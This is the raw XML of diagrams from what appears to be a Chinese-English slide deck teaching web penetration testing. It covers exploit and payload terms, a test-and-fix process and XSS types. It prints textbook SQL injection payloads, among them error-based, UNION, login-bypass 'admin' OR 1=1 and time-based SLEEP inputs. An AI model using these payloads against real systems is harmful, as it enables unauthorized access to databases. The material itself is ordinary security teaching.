    <dsp:sp modelId="{62B13D99-42B2-4293-8A91-7F8E86AB5523}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2858866"/>
          <a:ext cx="763128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273" tIns="333248" rIns="5922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Exploit </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0"/>
            <a:t>A piece of code or technique used to take advantage of a vulnerability or weakness in a system, application, or network.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2858866"/>
        <a:ext cx="7631289" cy="882000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AA4AF22E-F540-4E54-9AC7-EB8C57671E4E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="381564" y="2622706"/>
          <a:ext cx="175177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11" tIns="0" rIns="20191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</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="404621" y="2645763"/>
        <a:ext cx="1705656" cy="426206"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C5256EF4-F028-4B38-A01E-2D9A09E865C6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4063426"/>
          <a:ext cx="763128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273" tIns="333248" rIns="5922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 malicious part of an exploit, containing the code or instructions that an attacker wants to execute on the target system.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="4063426"/>
        <a:ext cx="7631289" cy="882000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{152FD357-02D4-406F-83D5-21DA54811272}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="381564" y="3827266"/>
          <a:ext cx="175177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11" tIns="0" rIns="20191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Payload</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="404621" y="3850323"/>
        <a:ext cx="1705656" cy="426206"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{615AE682-DAE0-4A81-B78F-C64F6661BB04}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5267986"/>
          <a:ext cx="7631289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273" tIns="333248" rIns="5922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Refer to the successful acquisition of a command shell on a target system, providing unauthorized access and control to the attacker</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="5267986"/>
        <a:ext cx="7631289" cy="882000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E09DB192-FC2A-4CFB-B6DC-9871A5EF2CAD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm flipH="1">
          <a:off x="381564" y="5031826"/>
          <a:ext cx="1792635" cy="472320"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="D52B17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11" tIns="0" rIns="20191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Get shell</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" b="1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404621" y="5054883"/>
        <a:ext cx="1746521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61137-81B2-4ECE-AB25-522714A6B5C0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1297" y="507453"/>
          <a:ext cx="1452536" cy="56067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41862D-8759-499E-BE04-DD513795BC59}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="388640" y="647623"/>
          <a:ext cx="1226586" cy="56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Discovery</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="405062" y="664045"/>
        <a:ext cx="1193742" cy="527835"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{03371F69-22F7-4904-80B1-1FD60AA6EA08}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1660417" y="507453"/>
          <a:ext cx="1452536" cy="56067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210689"/>
                <a:satOff val="4873"/>
                <a:lumOff val="25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10689"/>
                <a:satOff val="4873"/>
                <a:lumOff val="25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AC6FEA-7520-4EC2-BBBC-746EC4E12C78}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2047760" y="647623"/>
          <a:ext cx="1226586" cy="56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10689"/>
              <a:satOff val="4873"/>
              <a:lumOff val="25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Analysis and Verification</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2064182" y="664045"/>
        <a:ext cx="1193742" cy="527835"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8CC709BE-1E60-493D-8CA9-144586666C58}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3319537" y="507453"/>
          <a:ext cx="1452536" cy="56067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421378"/>
                <a:satOff val="9747"/>
                <a:lumOff val="519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1378"/>
                <a:satOff val="9747"/>
                <a:lumOff val="519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931127-ABD4-4DD2-B984-08D0D8CD79F5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3706880" y="647623"/>
          <a:ext cx="1226586" cy="56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21378"/>
              <a:satOff val="9747"/>
              <a:lumOff val="51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Reporting</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3723302" y="664045"/>
        <a:ext cx="1193742" cy="527835"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F92447D1-0983-437A-961F-5D47637340EB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4978656" y="507453"/>
          <a:ext cx="1452536" cy="56067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632067"/>
                <a:satOff val="14620"/>
                <a:lumOff val="779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32067"/>
                <a:satOff val="14620"/>
                <a:lumOff val="779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C8E0A9-44B0-448F-BA09-3D3A3CD37C08}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5366000" y="647623"/>
          <a:ext cx="1226586" cy="56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32067"/>
              <a:satOff val="14620"/>
              <a:lumOff val="779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Fixing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5382422" y="664045"/>
        <a:ext cx="1193742" cy="527835"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{33A651F8-FC14-4BFE-9C72-CEF93A74B212}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6637776" y="507453"/>
          <a:ext cx="1452536" cy="560679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842756"/>
                <a:satOff val="19494"/>
                <a:lumOff val="1039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2756"/>
                <a:satOff val="19494"/>
                <a:lumOff val="1039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571F17-C613-4440-9AE3-3B7CC47777EC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7025119" y="647623"/>
          <a:ext cx="1226586" cy="56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42756"/>
              <a:satOff val="19494"/>
              <a:lumOff val="103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Retest to Confirm Fixed </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7041541" y="664045"/>
        <a:ext cx="1193742" cy="5278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DD4A-65B2-426B-A5EB-BD5AD2320919}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="92045"/>
          <a:ext cx="6985236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687324" rIns="5421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* from </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>xx_table</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t> where </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>xx_name</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t> = </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight>
            </a:rPr>
            <a:t>‘’’</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>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3"/>
              </a:solidFill>
            </a:rPr>
            <a:t>REROR: …</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="92045"/>
        <a:ext cx="6985236" cy="1351350"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C48136C9-B32E-4E52-921F-7A779C220BD9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="296097" y="0"/>
          <a:ext cx="1251754" cy="5520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尝试：</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>’</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="323044" y="26947"/>
        <a:ext cx="1197860" cy="498113"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F0218530-B9FC-4066-AB22-BF201C936E58}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1777247"/>
          <a:ext cx="6985236" cy="15852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687324" rIns="5421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* from </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>xx_table</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t> where </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>xx_name</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t> = ‘</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:rPr>
            <a:t>1’ and exp(~(select database() a)) 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rPr>
            <a:t>-- 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</a:rPr>
            <a:t>’ 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3"/>
              </a:solidFill>
            </a:rPr>
            <a:t>DOUBLE value is out of range in ‘ exp(~’database’) ’a’))’</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1777247"/>
        <a:ext cx="6985236" cy="1585237"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C600AF1F-E3F4-4A51-9598-948EDA7B3D53}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="349261" y="1621595"/>
          <a:ext cx="6111005" cy="642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报错注入：</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>1’ and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>extractvalue</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>(1,concat(0x7e,SELECT database())) #</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="380637" y="1652971"/>
        <a:ext cx="6048253" cy="579979"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{070E4AEE-6867-49A9-84D8-25BCE1040EFF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3696335"/>
          <a:ext cx="6985236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687324" rIns="5421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* from </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>xx_table</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t> where </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>xx_name</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t> = ‘</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:rPr>
            <a:t>1’ AND ‘1’=‘0’ UNION SELECT database(); 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rPr>
            <a:t>- -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</a:rPr>
            <a:t>’;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3696335"/>
        <a:ext cx="6985236" cy="1299375"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6CCE2C0B-A46D-490C-9430-D4BED0BBABE7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="349261" y="3540684"/>
          <a:ext cx="6181905" cy="642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联合注入：</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>1’ AND ‘1’=‘0’ UNION SELECT database()#</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="380637" y="3572060"/>
        <a:ext cx="6119153" cy="5799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DD4A-65B2-426B-A5EB-BD5AD2320919}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="151714"/>
          <a:ext cx="6985236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499872" rIns="5421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username, password FROM users WHERE username = </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight>
            </a:rPr>
            <a:t>‘</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="1200" dirty="0">
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight>
            </a:rPr>
            <a:t>’’</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>AND password = '</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>输入的密码</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="1200" dirty="0"/>
            <a:t>';</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="151714"/>
        <a:ext cx="6985236" cy="1247400"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C48136C9-B32E-4E52-921F-7A779C220BD9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="349261" y="38513"/>
          <a:ext cx="1442402" cy="46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尝试：’</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="372080" y="61332"/>
        <a:ext cx="1396764" cy="421802"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F0218530-B9FC-4066-AB22-BF201C936E58}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1641914"/>
          <a:ext cx="6985236" cy="162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499872" rIns="5421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</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>username, password FROM users WHERE username = ‘</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:rPr>
            <a:t>admin' OR 1=1; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="86786F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:rPr>
            <a:t># </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="86786F"/>
              </a:solidFill>
            </a:rPr>
            <a:t>'</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="1200" dirty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</a:rPr>
            <a:t>AND password = '</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>输入的密码</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>';</a:t>
          </a:r>
          <a:endParaRPr lang="en-US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0" y="1641914"/>
        <a:ext cx="6985236" cy="1625400"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C600AF1F-E3F4-4A51-9598-948EDA7B3D53}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="349261" y="1528714"/>
          <a:ext cx="4702439" cy="46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万能密码：</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="0" i="0" kern="1200" dirty="0"/>
            <a:t>admin' OR 1=1; #</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="372080" y="1551533"/>
        <a:ext cx="4656801" cy="421802"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B26EF856-E590-4B9D-B74A-60A37DC10BCA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3510115"/>
          <a:ext cx="6985236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32" tIns="499872" rIns="5421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SELECT username, password FROM users WHERE username = ‘</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:rPr>
            <a:t>admin’ AND IF(1=1, SLEEP(5), 0); </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="86786F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:rPr>
            <a:t>#</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty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en-US" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>AND password = '</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>输入的密码</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>';</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1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0" y="3510115"/>
        <a:ext cx="6985236" cy="1474200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{168E814E-BFD7-4033-B860-E7472FB36FA3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="349261" y="3396914"/>
          <a:ext cx="5857965" cy="46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18" tIns="0" rIns="1848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时间注入：</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="0" i="0" kern="1200" dirty="0"/>
            <a:t>admin' AND IF(1=1, SLEEP(5), 0); #</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="372080" y="3419733"/>
        <a:ext cx="5812327" cy="4218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E09D-CF03-49D3-9A80-9E0807295655}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1365" y="1515132"/>
          <a:ext cx="1603542" cy="80177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XSS</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24848" y="1538615"/>
        <a:ext cx="1556576" cy="754805"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DC000199-A63A-4F6D-B581-DB2D573A58A1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="17678349">
          <a:off x="1155890" y="1197245"/>
          <a:ext cx="1540109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1540109" y="1883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7442" y="1177573"/>
        <a:ext cx="77005" cy="77005"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{50209067-CD63-48B2-8845-7E70BB001747}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2246982" y="17046"/>
          <a:ext cx="1603542" cy="99817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Reflected</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2276217" y="46281"/>
        <a:ext cx="1545072" cy="939703"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{515476AD-CB98-4717-A892-CE1AE84F5D72}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="21404290">
          <a:off x="1604386" y="1878870"/>
          <a:ext cx="643823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643823" y="1883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0202" y="1881605"/>
        <a:ext cx="32191" cy="32191"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{943F440C-FD04-493E-8B4E-11F22D5A36E2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2247687" y="1478499"/>
          <a:ext cx="1603542" cy="801771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Stored</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2271170" y="1501982"/>
        <a:ext cx="1556576" cy="754805"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A3424FEE-6A33-4D80-B236-41B595EF87EB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="3814251">
          <a:off x="1204218" y="2543799"/>
          <a:ext cx="1444160" cy="37661"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="18830"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1444160" y="1883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0195" y="2526526"/>
        <a:ext cx="72208" cy="72208"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{93B7F0A3-5CF4-44F3-A202-61506D047FF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2247690" y="2808357"/>
          <a:ext cx="1603542" cy="801771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Dom-based</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2271173" y="2831840"/>
        <a:ext cx="1556576" cy="7548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D9F7D-FC02-4DB8-9FE0-1E281F798643}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="33" y="923"/>
          <a:ext cx="3181456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Admin Page</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="33" y="923"/>
        <a:ext cx="3181456" cy="748800"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{244C49B1-99EB-4133-AE78-688C44A3B2F2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="33" y="749723"/>
          <a:ext cx="3181456" cy="17842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Content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Role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Member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Sharing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="33" y="749723"/>
        <a:ext cx="3181456" cy="1784250"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8F7CBD5D-3937-4DA6-B12A-D501E46CB25E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3626893" y="923"/>
          <a:ext cx="3181456" cy="748800"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent3">
            <a:hueOff val="842756"/>
            <a:satOff val="19494"/>
            <a:lumOff val="1039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Page</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3626893" y="923"/>
        <a:ext cx="3181456" cy="748800"/>
      </dsp:txXfrm>
    </dsp:sp>
